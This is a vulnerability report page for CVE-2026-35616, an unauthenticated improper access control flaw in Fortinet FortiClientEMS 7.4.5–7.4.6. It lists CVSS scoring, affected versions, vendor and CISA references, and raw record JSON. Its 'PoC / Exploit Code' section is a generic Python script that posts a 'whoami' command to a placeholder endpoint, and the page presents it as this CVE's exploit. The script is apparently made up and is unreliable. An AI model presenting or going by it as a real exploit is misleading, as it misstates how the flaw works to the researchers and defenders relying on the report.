Security Vulnerability Report
CVE-2026-35616 CVSS 9.8 CRITICAL


Published: 2026-04-04 01:16:40
Last Modified: 2026-04-06 18:12:58

Description

An improper access control vulnerability in Fortinet FortiClientEMS 7.4.5 through 7.4.6 may allow an unauthenticated attacker to execute unauthorized code or commands via crafted requests.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:fortinet:forticlientems:7.4.5:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:fortinet:forticlientems:7.4.6:*:*:*:*:*:*:* - VULNERABLE
Fortinet FortiClientEMS 7.4.5
Fortinet FortiClientEMS 7.4.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target configuration
target_url = "http://<TARGET_IP>:<PORT>/api/some_vulnerable_endpoint"

# Crafted payload to execute unauthorized code
payload = {
    "command": "whoami",
    "arg": "-a"
}

try:
    # Send malicious request without authentication
    response = requests.post(target_url, json=payload, verify=False, timeout=10)
    if response.status_code == 200:
        print("[+] Exploit successful! Response:")
        print(response.text)
    else:
        print(f"[-] Exploit failed. Status code: {response.status_code}")
        print(response.text)
except Exception as e:
    print(f"[!] Error occurred: {e}")

References

https://fortiguard.fortinet.com/psirt/FG-IR-26-099 (Vendor Advisory, Patch)
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-35616 (US Government Resource)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-35616",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-04T01:16:39.720",
    "lastModified": "2026-04-06T18:12:57.863",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A improper access control vulnerability in Fortinet FortiClientEMS 7.4.5 through 7.4.6 may allow an unauthenticated attacker to execute unauthorized code or commands via crafted requests."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "cisaExploitAdd": "2026-04-06",
    "cisaActionDue": "2026-04-09",
    "cisaRequiredAction": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.",
    "cisaVulnerabilityName": "Fortinet FortiClient EMS Improper Access Control Vulnerability",
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-284"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:fortinet:forticlientems:7.4.5:*:*:*:*:*:*:*",
                "matchCriteriaId": "7CFAA44F-6B24-4702-93B8-94B703D684D1"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:fortinet:forticlientems:7.4.6:*:*:*:*:*:*:*",
                "matchCriteriaId": "4AA9A954-1D6F-4B4D-9670-1DCF14F59737"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://fortiguard.fortinet.com/psirt/FG-IR-26-099",
        "source": "[email protected]",
        "tags": ["Vendor Advisory", "Patch"]
      },
      {
        "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-35616",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "tags": ["US Government Resource"]
      }
    ]
  }
}